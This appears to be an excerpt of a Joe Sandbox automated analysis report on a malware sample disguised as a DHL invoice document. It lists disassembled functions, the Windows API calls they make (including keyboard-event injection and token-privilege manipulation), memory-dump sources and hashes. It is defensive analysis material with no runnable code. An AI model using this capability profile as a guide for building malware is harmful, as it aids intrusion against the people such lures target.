                                                                                                                        • Opcode ID: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                                                                                                                        • Instruction ID: 0bacec0b9821714b25b82f874425631add3d9bd6992bc2604906cf18900b6b46
                                                                                                                        • Opcode Fuzzy Hash: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                                                                                                                        • Instruction Fuzzy Hash: D1F0E931E0222477DB235F669C09F5A379CBF81BA1B16C121FC19EA798CA70D80187E0
                                                                                                                        Function 00363820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                                                                                                                        • Instruction ID: 2cf55821c48fd11a81ab9eb50d58ca704f4469b6abf007a6ff389cc41ee8b237
                                                                                                                        • Opcode Fuzzy Hash: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                                                                                                                        • Instruction Fuzzy Hash: EBE065311012245AE62326679D05FDA364DAF427B1F168121BC15979A5DB21DD0983E1
                                                                                                                        Function 00334F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334F6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                                                                                                                        • Instruction ID: 3f4a2224b770f5b943adbb0074c412cbd91a2cac95658aad71e4a650ae29a09d
                                                                                                                        • Opcode Fuzzy Hash: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                                                                                                                        • Instruction Fuzzy Hash: D2F03071105751CFDB369F65D4D0C12B7E4EF1431971989BEE1DA82621C731B844DF10
                                                                                                                        Function 00332DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541455249-0
                                                                                                                        • Opcode ID: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
                                                                                                                        • Instruction ID: 6346e4f0b0c98929a1b22679263779550ec29980a0d1a42b1304a5e7413182d5
                                                                                                                        • Opcode Fuzzy Hash: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
                                                                                                                        • Instruction Fuzzy Hash: 24E0CD72A001245BCB2192589C06FDA77DDDFC8790F044171FD0DD7248D964AD808650
                                                                                                                        Function 003A2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2638373210-0
                                                                                                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                        • Instruction ID: 2cd68d873279b0e8104e08730d2c72de325377209425b602f3b4c4f233cec5a7
                                                                                                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                        • Instruction Fuzzy Hash: 1AE048B06097005FDF3D5A28A9517B777E4DF4A301F01045EF59F86362E5726845864D
                                                                                                                        Function 00332B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00333837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
                                                                                                                          • Part of subcall function 0033D730: GetInputState.USER32 ref: 0033D807
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
                                                                                                                          • Part of subcall function 003330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0033314E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3667716007-0
                                                                                                                        • Opcode ID: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
                                                                                                                        • Instruction ID: 85978609952f98b87d66c0b07f4000739faeb47cb577b449dc7e6a8b379fd551
                                                                                                                        • Opcode Fuzzy Hash: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
                                                                                                                        • Instruction Fuzzy Hash: A9E08C3270424406CA0ABB74A8D29AEA7599BD1362F40957EF1469F1B3CF788A498352
                                                                                                                        Function 0037039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                                                                                                                        • Instruction ID: ac8a46d0addd19556b3628a25f6ae7668807543c71acdddecb0c9aa0ecd51c45
                                                                                                                        • Opcode Fuzzy Hash: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                                                                                                                        • Instruction Fuzzy Hash: 03D06C3205010DBBDF028F85DD06EDA3BAAFB48714F014000FE1896020C732E821AB90
                                                                                                                        Function 00331CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00331CBC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3098949447-0
                                                                                                                        • Opcode ID: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                                                                                                                        • Instruction ID: 33387f2f6a3ff370a05c65ba35ef2c45abeaaf9cacc42fb2f3380e888f03731d
                                                                                                                        • Opcode Fuzzy Hash: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                                                                                                                        • Instruction Fuzzy Hash: 39C09236280304AFF3159B80BE4EF107768A348B00F049011FA0EB95F3C3F22821EB58
                                                                                                                        Function 00EAEFA4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00EAEFB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction ID: 0e6526e7fd069c127236d9150c4d20ff0deb11b7584831d5ffe1bd636e7a1875
                                                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction Fuzzy Hash: 33E0BF7494410DEFDB00DFA4D5496DD7BB4EF04301F1005A1FD05E7680DB309E548A62
                                                                                                                        Function 00EAEFA8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00EAEFB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction ID: 59dcdad68bc842b8c764e424ad03a103ae0e501fae225cf6353e023ef39a08bd
                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction Fuzzy Hash: DDE0E67494410DDFDB00DFB4D54969D7FB4EF04301F100161FD01E2280D6309D508A62

                                                                                                                        Non-executed Functions

                                                                                                                        Function 003C9576 Relevance: 75.9, APIs: 39, Strings: 4, Instructions: 625windowkeyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003C961A
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C965B
                                                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 003C969F
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C96C9
                                                                                                                        • SendMessageW.USER32 ref: 003C96F2
                                                                                                                        • GetKeyState.USER32(00000011), ref: 003C978B
                                                                                                                        • GetKeyState.USER32(00000009), ref: 003C9798
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C97AE
                                                                                                                        • GetKeyState.USER32(00000010), ref: 003C97B8
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C97E9
                                                                                                                        • SendMessageW.USER32 ref: 003C9810
                                                                                                                        • SendMessageW.USER32(?,00001030,?,003C7E95), ref: 003C9918
                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003C992E
                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003C9941
                                                                                                                        • SetCapture.USER32(?), ref: 003C994A
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 003C99AF
                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003C99BC
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C99D6
                                                                                                                        • ReleaseCapture.USER32 ref: 003C99E1
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C9A19
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 003C9A26
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9A80
                                                                                                                        • SendMessageW.USER32 ref: 003C9AAE
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9AEB
                                                                                                                        • SendMessageW.USER32 ref: 003C9B1A
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003C9B3B
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003C9B4A
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C9B68
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 003C9B75
                                                                                                                        • GetParent.USER32(?), ref: 003C9B93
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9BFA
                                                                                                                        • SendMessageW.USER32 ref: 003C9C2B
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 003C9C84
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003C9CB4
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9CDE
                                                                                                                        • SendMessageW.USER32 ref: 003C9D01
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 003C9D4E
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003C9D82
                                                                                                                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C9E05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                        • String ID: @GUI_DRAGID$F$p#@$xV
                                                                                                                        • API String ID: 3429851547-966052478
                                                                                                                        • Opcode ID: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                                                                                                                        • Instruction ID: af9508be6e0fb572f4d1409759fb21310d8a1905771202ecbed07574a2db8918
                                                                                                                        • Opcode Fuzzy Hash: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                                                                                                                        • Instruction Fuzzy Hash: 44427A75204200AFD726CF24CD48FAABBE9EF49320F16461EF599D72A1D731AD60CB41
                                                                                                                        Function 003C4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003C48F3
                                                                                                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 003C4908
                                                                                                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 003C4927
                                                                                                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 003C494B
                                                                                                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 003C495C
                                                                                                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 003C497B
                                                                                                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003C49AE
                                                                                                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003C49D4
                                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 003C4A0F
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A56
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A7E
                                                                                                                        • IsMenu.USER32(?), ref: 003C4A97
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4AF2
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4B20
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C4B94
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 003C4BE3
                                                                                                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 003C4C82
                                                                                                                        • wsprintfW.USER32 ref: 003C4CAE
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4CC9
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4CF1
                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C4D13
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4D33
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4D5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                        • String ID: %d/%02d/%02d$xV
                                                                                                                        • API String ID: 4054740463-4269844612
                                                                                                                        • Opcode ID: 0996331b507132453de7c0357b7d48fdb02e47eb585655bf7e6359a9119788ec
                                                                                                                        • Instruction ID: bdb6218166c7d323c4c120638b7c2ef9361ad7744affc44735fe87b1533bc78e
                                                                                                                        • Opcode Fuzzy Hash: 0996331b507132453de7c0357b7d48fdb02e47eb585655bf7e6359a9119788ec
                                                                                                                        • Instruction Fuzzy Hash: 9112EF71600214ABEB269F28CD59FAEBBF8EF45310F14412DF51AEA2E1DB74AD41CB50
                                                                                                                        Function 0034F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0034F998
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0038F474
                                                                                                                        • IsIconic.USER32(00000000), ref: 0038F47D
                                                                                                                        • ShowWindow.USER32(00000000,00000009), ref: 0038F48A
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0038F494
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4AA
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0038F4B1
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4BD
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4CE
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4D6
                                                                                                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0038F4DE
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0038F4E1
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F4F6
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0038F501
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F50B
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0038F510
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F519
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0038F51E
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F528
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0038F52D
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0038F530
                                                                                                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0038F557
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                        • Opcode ID: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
                                                                                                                        • Instruction ID: c1d1e841566c22dbec90070190faa570de5ddaa237eebe1dddbc9bcbce59ce55
                                                                                                                        • Opcode Fuzzy Hash: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
                                                                                                                        • Instruction Fuzzy Hash: C531A671A50318BFEB226BB64C4AFBF7E6CEB45B50F151066F604E61D1C7B06D00AB60
                                                                                                                        Function 00391201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                                                                                                                          • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                                                                                                                          • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00391286
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003912A8
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 003912B9
                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003912D1
                                                                                                                        • GetProcessWindowStation.USER32 ref: 003912EA
                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 003912F4
                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00391310
                                                                                                                          • Part of subcall function 003910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
